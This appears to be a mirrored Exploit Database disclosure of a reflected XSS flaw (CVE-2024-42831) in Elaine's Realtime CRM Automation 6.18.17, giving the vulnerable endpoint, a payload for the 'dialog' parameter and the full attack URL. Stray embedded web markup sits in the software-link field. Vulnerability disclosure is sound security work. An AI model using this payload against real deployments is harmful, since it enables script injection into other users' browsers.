Elaine’s Realtime CRM Automation 6.18.17 – Reflected XSS

• Exploit Database
• 8 阅读

• 作者： arfaoui haythem
  日期： 2025-04-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/52106/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

  # Exploit Title: Elaine&apos;s Realtime CRM Automation 6.18.17 - Reflected XSS # Date: 09/2024 # Exploit Author: Haythem Arfaoui (CBTW Team) # Vendor Homepage: https://www.elaine.io/ # Software Link: <blockquote class="wp-embedded-content" data-secret="KEOojDL4wS"><a href="https://www.elaine.io/en/products/elaine-marketing-automation/" target="_blank"rel="external nofollow" class="external" >ELAINE NEU Marketing Automation EN</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“ELAINE NEU Marketing Automation EN” — ELAINE technologies GmbH" src="https://www.elaine.io/en/products/elaine-marketing-automation/embed/#?secret=KDxxE1LC2y#?secret=KEOojDL4wS" data-secret="KEOojDL4wS" frameborder="0" marginmarginscrolling="no"></iframe> # Version: 6.18.17 and below # Tested on: Windows, Linux # CVE : CVE-2024-42831     # Description A reflected cross-site scripting (XSS) vulnerability in Elaine&apos;s Realtime CRM Automation v6.18.17 allows attackers to execute arbitrary JavaScript code in the web browser of a user via injecting a crafted payload into the dialog parameter at wrapper_dialog.php.   # Steps to reproduce: 1. Navigate to any website that contains Elaine&apos;s Realtime CRM Automation 2. Navigate to this endpoint: /system/interface/wrapper_dialog.php 3. Append the payload*a"%20onafterscriptexecute=alert(document.domain)> *in the *"dialog*" param and execute the request 4. Final URL : /system/interface/wrapper_dialog.php?dialog=a"%20onafterscriptexecute=alert(document.domain)>